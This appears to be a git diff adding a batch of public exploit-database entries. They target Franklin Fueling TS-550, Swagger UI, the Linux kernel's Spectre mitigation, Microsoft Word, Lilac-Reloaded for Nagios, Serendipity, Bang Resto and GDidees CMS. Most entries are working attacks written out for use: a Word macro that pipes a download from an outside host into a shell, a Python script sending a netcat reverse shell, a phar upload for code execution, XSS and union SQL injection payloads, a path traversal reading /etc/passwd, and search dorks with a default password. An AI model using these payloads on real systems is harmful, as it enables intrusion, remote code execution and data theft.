diff --git a/exploits/hardware/remote/51382.txt b/exploits/hardware/remote/51382.txt new file mode 100644 index 000000000..cebcecef5 --- /dev/null +++ b/exploits/hardware/remote/51382.txt @@ -0,0 +1,60 @@ +# Exploit Title: Franklin Fueling Systems TS-550 - Default Password +# Date: 4/16/2023 +# Exploit Author: parsa rezaie khiabanloo +# Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/) +# Version: TS-550 +# Tested on: Linux/Android(termux) + +Step 1 : attacker can using these dorks and access to find the panel + +inurl:"relay_status.html" + +inurl:"fms_compliance.html" + +inurl:"fms_alarms.html" + +inurl:"system_status.html" + +inurl:"system_reports.html' + +inurl:"tank_status.html" + +inurl:"sensor_status.html" + +inurl:"tank_control.html" + +inurl:"fms_reports.html" + +inurl:"correction_table.html" + +Step 2 : attacker can send request + +curl -H "Content-Type:text/xml" --data '' http://IP:10001/cgi-bin/tsaws.cgi + + +Step 3 : if get response that show like this + + + + + + + + + + +Step 4 : attacker can crack the hashesh using john the ripper + +notice : most of the panels password is : admin + +Disclaimer: +The information provided in this advisory is provided "as is" without +warranty of any kind. Trustwave disclaims all warranties, either express or +implied, including the warranties of merchantability and fitness for a +particular purpose. In no event shall Trustwave or its suppliers be liable +for any damages whatsoever including direct, indirect, incidental, +consequential, loss of business profits or special damages, even if +Trustwave or its suppliers have been advised of the possibility of such +damages. Some states do not allow the exclusion or limitation of liability +for consequential or incidental damages so the foregoing limitation may not +apply. \ No newline at end of file diff --git a/exploits/json/webapps/51379.txt b/exploits/json/webapps/51379.txt new file mode 100644 index 000000000..e5e8d0001 --- /dev/null +++ b/exploits/json/webapps/51379.txt @@ -0,0 +1,75 @@ +# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information +# Date: 14 April, 2023 +# Exploit Author: Rafael Cintra Lopes +# Vendor Homepage: https://swagger.io/ +# Version: < 4.1.3 +# CVE: CVE-2018-25031 +# Site: https://rafaelcintralopes.com.br/ + +# Usage: python swagger-exploit.py https://[swagger-page].com + +from selenium import webdriver +from selenium.webdriver.common.desired_capabilities import DesiredCapabilities +from selenium.webdriver.chrome.service import Service +import time +import json +import sys + +if __name__ == "__main__": + + target = sys.argv[1] + + desired_capabilities = DesiredCapabilities.CHROME + desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"} + + options = webdriver.ChromeOptions() + options.add_argument("--headless") + options.add_argument("--ignore-certificate-errors") + options.add_argument("--log-level=3") + options.add_experimental_option("excludeSwitches", ["enable-logging"]) + + # Browser webdriver path + drive_service = Service("C:/chromedriver.exe") + + driver = webdriver.Chrome(service=drive_service, + options=options, + desired_capabilities=desired_capabilities) + + driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json") + time.sleep(10) + driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json") + time.sleep(10) + + logs = driver.get_log("performance") + + with open("log_file.json", "w", encoding="utf-8") as f: + f.write("[") + + for log in logs: + log_file = json.loads(log["message"])["message"] + + if("Network.response" in log_file["method"] + or "Network.request" in log_file["method"] + or "Network.webSocket" in log_file["method"]): + + f.write(json.dumps(log_file)+",") + f.write("{}]") + + driver.quit() + + json_file_path = "log_file.json" + with open(json_file_path, "r", encoding="utf-8") as f: + logs = json.loads(f.read()) + + for log in logs: + try: + url = log["params"]["request"]["url"] + + if(url == "https://petstore.swagger.io/v2/hacked1.json"): + print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json") + + if(url == "https://petstore.swagger.io/v2/hacked2.json"): + print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json") + + except Exception as e: + pass \ No newline at end of file diff --git a/exploits/linux/local/51384.txt b/exploits/linux/local/51384.txt new file mode 100644 index 000000000..97317a90b --- /dev/null +++ b/exploits/linux/local/51384.txt @@ -0,0 +1,232 @@ +## Exploit Title: Linux Kernel 6.2 - Userspace Processes To Enable Mitigation +## Exploit Author: nu11secur1ty +## CVE ID: CVE-2023-1998 + +## Description +## Summary +The Linux kernel allows userspace processes to enable mitigations by +calling prctl with +[PR_SET_SPECULATION_CTRL](https://docs.kernel.org/userspace-api/spec_ctrl.html) +which disables the speculation feature as well as by using seccomp. We +had noticed that on VMs of at least one major cloud provider, the +kernel still left the victim process exposed to attacks in some cases +even after enabling the spectre-BTI mitigation with prctl. The same +beahaviour can be observed on a bare-metal machine when forcing the +mitigation to IBRS on boot comand line. + +This happened because when plain IBRS was enabled (not enhanced IBRS), +the kernel had some logic that determined that +[STIBP](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/single-thread-indirect-branch-predictors.html) +was not needed. The IBRS bit implicitly protects against cross-thread +branch target injection. However, with legacy +[IBRS](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-restricted-speculation.html), +the IBRS bit was cleared on returning to userspace, due to performance +reasons, which disabled the implicit STIBP and left userspace threads +vulnerable to cross-thread branch target injection against which STIBP +protects. + +## Severity +Medium - The kernel failed to protect applications that attempted to +protect against Spectre v2 leaving them open to attack from other +processes running on the same physical core in another hyperthread. + +## Vulnerable code +The Bug present on Kernel 6.2 +(https://elixir.bootlin.com/linux/v6.2/source/arch/x86/kernel/cpu/bugs.c#L1196) +implements an optimization that disables STIBP if the mitgation is +IBRS or eIBRS. However IBRS doesn't mitigate SMT attacks on userspace +as eIBRS does. Setting spectre_v2=ibrs on kernel boot parameters for +bare metal machines without eIBRS support also triggers the bug. + +```c + /* + * If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible, + * STIBP is not required. + */ + if (!boot_cpu_has(X86_FEATURE_STIBP) || + !smt_possible || + spectre_v2_in_ibrs_mode(spectre_v2_enabled)) + return; +``` +## Proof of Concept +The test consists of two processes. The attacker constantly poisons an +indirect call to speculatively redirect it to a target address. The +victim process measures the mispredict rate and tries to mitigate the +attack either by calling PRCTL or writing to the MSR directly using a +kernel module that exposes MSR read and write operations to userspace. + +```c +/* +gcc -o victim test.c -O0 -masm=intel -w -DVICTIM +gcc -o victim-PRCTL test.c -O0 -masm=intel -w -DVICTIM -DPRCTL +gcc -o victim-nospecctrl test.c -O0 -masm=intel -w -DVICTIM +-DMSR -DMSR_VAL=0 +gcc -o victim-IBRS test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=1 +gcc -o victim-STIBP test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=2 +gcc -o victim-IBPB test.c -O0 -masm=intel -w -DVICTIM -DMSR +-DMSR_VAL=0 -DIBPB +gcc -o attacker test.c -O0 -masm=intel -w +*/ +#include "utils.h" +#include +#include +#include + +#ifndef PRINT_AMMOUNT +#define PRINT_AMMOUNT 1000 +#endif + +#define IA32_SPEC_CTRL 72 + +uint8_t *rdiPtr; +uint8_t unused[0x500]; +uint8_t probeArray[0x1000] = {2}; +uint8_t unuse2[0x500]; + +uint32_t f1() {} + +int poison(uint8_t *srcAddress, uint8_t *dstAddress, uint64_t cpu) +{ + volatile uint8_t d; + + unsigned tries = 0; + unsigned hits = 0; + unsigned totalHits = 0; + unsigned totalTries = 0; + + jitForLoop(srcAddress); + + while (1) + { + +#ifndef VICTIM + callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray); + continue; +#else + +#ifdef IBPB + wrmsr_on_cpu(73, cpu, 1); +#endif + for (int i = 0; i < 100; i++) + { + d = *dstAddress; + flush((uint8_t *)&rdiPtr); + callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray); + } + + if (probe(&probeArray[0]) < THRESHOLD) + { + hits++; + totalHits++; + } + + totalTries++; + if (++tries % PRINT_AMMOUNT == 0) + { + + printf("Rate: %u/%u MSR[72]=%d\n", hits, +tries,rdmsr_on_cpu(IA32_SPEC_CTRL,cpu)); + #ifdef MSR + wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL); + #endif + tries = 0; + hits = 0; + if (totalTries >= PRINT_AMMOUNT * 10) + { + break; + } + } + usleep(1); + +#endif + } + + printf("Total mispredict rate: %d/%d (%.2f %)\n", totalHits, +totalTries, (float)totalHits * 100 / (float)totalTries); +} + +int main(int argc, char **argv) +{ + + uint64_t srcAddress; + uint64_t dstAddress; + uint64_t cpu; + + if (argc < 4) + { + printf("Usage: %s \n", argv[0]); + printf("Example: %s 0x55555554123 0x55555555345 1 \n", argv[0]); + return 0; + } + + srcAddress = (uint64_t)strtoull(argv[1], NULL, 16); + dstAddress = (uint64_t)strtoull(argv[2], NULL, 16); + cpu = (uint64_t)strtoull(argv[3], NULL, 16); + SetCoreAffinity(cpu); + + uint8_t *rwx1 = requestMem((uint8_t *)(srcAddress & (~0xfffULL)), 0x1000); + uint8_t *rwx2 = requestMem((uint8_t *)(dstAddress & (~0xfffULL)), 0x1000); + +#ifdef PRCTL + if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, +PR_SPEC_FORCE_DISABLE, 0, 0) != 0) + { + perror("prctl"); + } + printf("PRCTL GET value 0x%x\n", prctl(PR_GET_SPECULATION_CTRL, +PR_SPEC_INDIRECT_BRANCH, 0, 0, 0)); +#endif + +#ifdef MSR + printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, +rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu); + wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL); + printf("writing msr[%d]=%d on core %d \n", IA32_SPEC_CTRL, MSR_VAL, cpu); + printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, +rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu); +#endif + +// set up leak gadget into position +#ifdef VICTIM + rdiPtr = (uint8_t *)f1; + copyLeakGadget(dstAddress); +#else + rdiPtr = (uint8_t *)dstAddress; + copyRetGadget(dstAddress); +#endif + + poison(srcAddress, dstAddress, cpu); + +#ifdef MSR + printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, +rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu); +#endif +} +``` + + +Timeline + +**Date reported** to Cloud providers: 31/12/2022 + +**Date reported** to security@kernel.org: 20/02/2022 + +**Date fixed:** 10/03/2023 + +- [torvalds/linux@6921ed9](https://github.com/torvalds/linux/commit/6921ed9049bc7457f66c1596c5b78aec0dae4a9d) + +- https://kernel.dance/#6921ed9049bc7457f66c1596c5b78aec0dae4a9d + +Date disclosed: 12/04/2023 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/multiple/remote/51376.txt b/exploits/multiple/remote/51376.txt new file mode 100644 index 000000000..8220a6fb9 --- /dev/null +++ b/exploits/multiple/remote/51376.txt @@ -0,0 +1,58 @@ +## Exploit Title: Microsoft Word 16.72.23040900 - Remote Code Execution (RCE) +## Author: nu11secur1ty +## Date: 04.14.2023 +## Vendor: https://www.microsoft.com/ +## Software: +https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3 +## Reference: +https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/ +## CVE-ID: CVE-2023-28311 + +## Description: +The attack itself is carried out locally by a user with authentication to +the targeted system. An attacker could exploit the vulnerability by +convincing a victim, through social engineering, to download and open a +specially crafted file from a website which could lead to a local attack on +the victim's computer. The attacker can trick the victim to open a +malicious web page by using a `Word` malicious file and he can steal +credentials, bank accounts information, sniffing and tracking all the +traffic of the victim without stopping - it depends on the scenario and etc. + +STATUS: HIGH Vulnerability + +[+]Exploit: +The exploit server must be BROADCASTING at the moment when the victim hit +the button of the exploit! + +```vbs + Call Shell("cmd.exe /S /c" & "curl -s +http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus) +``` + +## Reproduce: +[href]( +https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311) + +## Reference: +[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311) + +[href]( +https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/) + +## Proof and Exploit +[href](https://streamable.com/s60x3k) + +## Time spend: +01:00:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51372.txt b/exploits/php/webapps/51372.txt new file mode 100644 index 000000000..f37a9a033 --- /dev/null +++ b/exploits/php/webapps/51372.txt @@ -0,0 +1,99 @@ +Exploit Title: Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated) +Application: Serendipity +Version: 2.4.0 +Bugs: Remote Code Execution (RCE) (Authenticated) via file upload +Technology: PHP +Vendor URL: https://docs.s9y.org/ +Software Link: https://docs.s9y.org/downloads.html +Date of found: 13.04.2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +If we load the poc.phar file in the image field while creating a category, we can run commands on the system. + + I wrote a file with the above payload, a poc.phar extension, and uploaded it. + +Visit to http://localhost/serendipity/uploads/poc.phar + +poc request: + + +POST /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC HTTP/1.1 +Host: localhost +Content-Length: 1561 +Cache-Control: max-age=0 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWKPiba66PSVGQzc +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: iframe +Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect&serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=430b341df3f78f52691c8cf935fa04e1c05854df; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[hideSubdirFiles]=; serendipity[addmedia_directory]=; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.date; serendipity[sortorder_ordermode]=DESC; serendipity[filter][i.date][from]=; serendipity[filter][i.date][to]=; serendipity[filter][i.name]=; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=267; serendipity[imgWidth]=1000; serendipity[imgHeight]=667; serendipity[imgID]=1; serendipity[baseURL]=http%3A//localhost/serendipity/; serendipity[indexFile]=index.php; serendipity[imgName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.jpeg; serendipity[thumbName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.serendipityThumb.jpeg; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; accessibletab_mediaupload_tabs_active=0; serendipity[filter][fileCategory]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b +Connection: close + +------WebKitFormBoundaryZWKPiba66PSVGQzc +Content-Disposition: form-data; name="serendipity[token]" + +ae9b8ae35a756c24f9552a021ee81d56 +------WebKitFormBoundaryZWKPiba66PSVGQzc +Content-Disposition: form-data; name="serendipity[action]" + +admin +------WebKitFormBoundaryZWKPiba66PSVGQzc +Content-Disposition: form-data; name="serendipity[adminModule]" + +media +------WebKitFormBoundaryZWKPiba66PSVGQzc +Content-Disposition: form-data; name="serendipity[adminAction]" + +add +------WebKitFormBoundaryZWKPiba66PSVGQzc +Content-Disposition: form-data; name="serendipity[userfile][1]"; filename="poc.phar" +Content-Type: application/octet-stream + + + +------WebKitFormBoundaryZWKPiba66PSVGQzc +Content-Disposition: form-data; name="serendipity[target_filename][1]" + +poc.phar +------WebKitFormBoundaryZWKPiba66PSVGQzc +Content-Disposition: form-data; name="serendipity[target_directory][1]" + + +------WebKitFormBoundaryZWKPiba66PSVGQzc +Content-Disposition: form-data; name="serendipity[column_count][1]" + +true +------WebKitFormBoundaryZWKPiba66PSVGQzc +Content-Disposition: form-data; name="serendipity[imageurl]" + + +------WebKitFormBoundaryZWKPiba66PSVGQzc +Content-Disposition: form-data; name="serendipity[imageimporttype]" + +image +------WebKitFormBoundaryZWKPiba66PSVGQzc +Content-Disposition: form-data; name="serendipity[target_filename][]" + + +------WebKitFormBoundaryZWKPiba66PSVGQzc +Content-Disposition: form-data; name="serendipity[target_directory][]" + + +------WebKitFormBoundaryZWKPiba66PSVGQzc-- + + +poc video : https://youtu.be/_VrrKOTywgo \ No newline at end of file diff --git a/exploits/php/webapps/51373.txt b/exploits/php/webapps/51373.txt new file mode 100644 index 000000000..50d02e17f --- /dev/null +++ b/exploits/php/webapps/51373.txt @@ -0,0 +1,47 @@ +Exploit Title: Serendipity 2.4.0 - Cross-Site Scripting (XSS) +Author: Mirabbas Ağalarov +Application: Serendipity +Version: 2.4.0 +Bugs: Stored XSS +Technology: PHP +Vendor URL: https://docs.s9y.org/ +Software Link: https://docs.s9y.org/downloads.html +Date of found: 13.04.2023 +Tested on: Linux + + +2. Technical Details & POC +======================================== +steps: + +1.Anyone who has the authority to create the new entry can do this +payload: hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E + + +POST /serendipity/serendipity_admin.php? HTTP/1.1 +Host: localhost +Content-Length: 730 +Cache-Control: max-age=0 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=c74c7da50976c82e628d7a8dfdb7c9e3ebc8188b; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b +Connection: close + +serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D=1681366826&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=ae9b8ae35a756c24f9552a021ee81d56&serendipity%5Btitle%5D=asdf&serendipity%5Bbody%5D=hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&serendipity%5Bextended%5D=&serendipity%5Bchk_timestamp%5D=1681366826&serendipity%5Bnew_date%5D=2023-04-13&serendipity%5Bnew_time%5D=10%3A20&serendipity%5Bisdraft%5D=false&serendipity%5Ballow_comments%5D=true&serendipity%5Bpropertyform%5D=true&serendipity%5Bproperties%5D%5Baccess%5D=public&ignore_password=&serendipity%5Bproperties%5D%5Bentrypassword%5D=&serendipity%5Bchange_author%5D=1 + + + +2. visit the entry you created \ No newline at end of file diff --git a/exploits/php/webapps/51374.py b/exploits/php/webapps/51374.py new file mode 100755 index 000000000..49ae7e57f --- /dev/null +++ b/exploits/php/webapps/51374.py @@ -0,0 +1,68 @@ +#!/usr/bin/env python + +""" +# Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE) +# Google Dork: N/A +# Date: 2023-04-13 +# Exploit Author: max / Zoltan Padanyi +# Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit +# Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download +# Version: 2.0.8 +# Tested on: Debian 7.6 +# CVE : N/A + +The autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ; + +Use at your own risk! + +RCA - wild exec is ongoing without any filtering + +in library/Net/Traceroute.php + + 181 function _setTraceroutePath($sysname) + 182 { + 183 $status = ''; + 184 $output = array(); + 185 $traceroute_path = ''; + 186 + 187 if ("windows" == $sysname) { + 188 return "tracert"; + 189 } else { + 190 $traceroute_path = exec("which traceroute", $output, $status); + [...] + 257 function traceroute($host) + 258 { + 259 + 260 $argList = $this->_createArgList(); + 261 $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1]; + 262 exec($cmd, $this->_result); + + +""" + +import requests +import argparse + +parser = argparse.ArgumentParser() +parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True) +parser.add_argument("-i", "--ip", help="Listener IP", required=True) +parser.add_argument("-p", "--port", help="Listener port", required=True, type=int) +args = parser.parse_args() + +rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;" + +body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"} + +try: + r = requests.get(args.url) + if r.ok: + print("[+] URL looks good...moving forward...") + print("[+] Sending exploit in...") + r = requests.post(args.url,data=body) + if r.ok: + print("[+] Got HTTP 200, check your listener!") + else: + print("[-] Some kind of error happened, check the http response below!") + print(r.text) +except Exception as e: + print("General exception: " + str(e)) \ No newline at end of file diff --git a/exploits/php/webapps/51377.txt b/exploits/php/webapps/51377.txt new file mode 100644 index 000000000..974609f47 --- /dev/null +++ b/exploits/php/webapps/51377.txt @@ -0,0 +1,35 @@ +# Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS) +# Date: 2023-04-02 +# Exploit Author: Rahad Chowdhury +# Vendor Homepage: +https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html +# Software Link: +https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip +# Version: 1.0 +# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 +# CVE: CVE-2023-29848 + +*Steps to Reproduce:* +1. First login to your admin panel. +2. then go to Menu section and click add new menu from group. +your request data will be: + +POST /bangresto/admin/menu.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) +Gecko/20100101 Firefox/111.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 87 +Origin: http://127.0.0.1 +Referer: http://127.0.0.1/bangresto/admin/menu.php +Cookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6 +Connection: close + +itemName=test&itemPrice=1&menuID=1&addItem= + +3. Then use any XSS Payload in "itemName" parameter and click add. +4. You will see XSS pop up. \ No newline at end of file diff --git a/exploits/php/webapps/51378.txt b/exploits/php/webapps/51378.txt new file mode 100644 index 000000000..b1cea4d3c --- /dev/null +++ b/exploits/php/webapps/51378.txt @@ -0,0 +1,43 @@ +# Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection +# Date: 2023-04-02 +# Exploit Author: Rahad Chowdhury +# Vendor Homepage: +https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html +# Software Link: +https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip +# Version: 1.0 +# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 +# CVE: CVE-2023-29849 + +*Affected Parameters:* +btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[], +itemqty[], btnMenuItemID + +*Steps to Reproduce:* +1. First login your staff panel. +2. then go to "order" menu and Select menu then create order and intercept +request data using burp suite. +so your request data will be: + +POST /bangresto/staff/displayitem.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) +Gecko/20100101 Firefox/111.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 194 +Origin: http://127.0.0.1 +Referer: http://127.0.0.1/bangresto/staff/order.php +Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5 +Connection: close + +btnMenuItemID=1&qty=1 + +3. "btnMenuItemID" parameter is vulnerable. Let's try to inject union based +SQL Injection use this query ".1 union select +1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())-- +-" in "btnMenuItemID" parameter. +4. Check browser you will see user, database and version informations. \ No newline at end of file diff --git a/exploits/php/webapps/51381.txt b/exploits/php/webapps/51381.txt new file mode 100644 index 000000000..56e73d531 --- /dev/null +++ b/exploits/php/webapps/51381.txt @@ -0,0 +1,76 @@ +# Exploit Title: GDidees CMS 3.9.1 - Local File Disclosure +# Date : 03/27/2023 +# Exploit Author : Hadi Mene +# Vendor Homepage : https://www.gdidees.eu/ +# Software Link : https://www.gdidees.eu/cms-1-0.html +# Version : 3.9.1 and earlier +# Tested on : Debian 11 +# CVE : CVE-2023-27179 + +### Summary: + +GDidees CMS v3.9.1 and lower versions was discovered to contain a local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php. + + +### Description : + +Imgdownload.php is mainly used by the QR code generation module to download an QR code. +The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized. +Furthermore, there is no admin session check in this code as it should since only the admin user should normally +be able to download QR code. + +Vulnerable Code : + +3. if (isset($_GET["filename"])) { +4. $filename=$_GET["filename"]; + ..... + ..... +27. @readfile($filename) OR die(); + + +### POC : + +URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd + +Exploitation using curl +# curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +_apt:x:100:65534::/nonexistent:/usr/sbin/nologin +systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin +systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin +systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin +ntp:x:104:110::/nonexistent:/usr/sbin/nologin 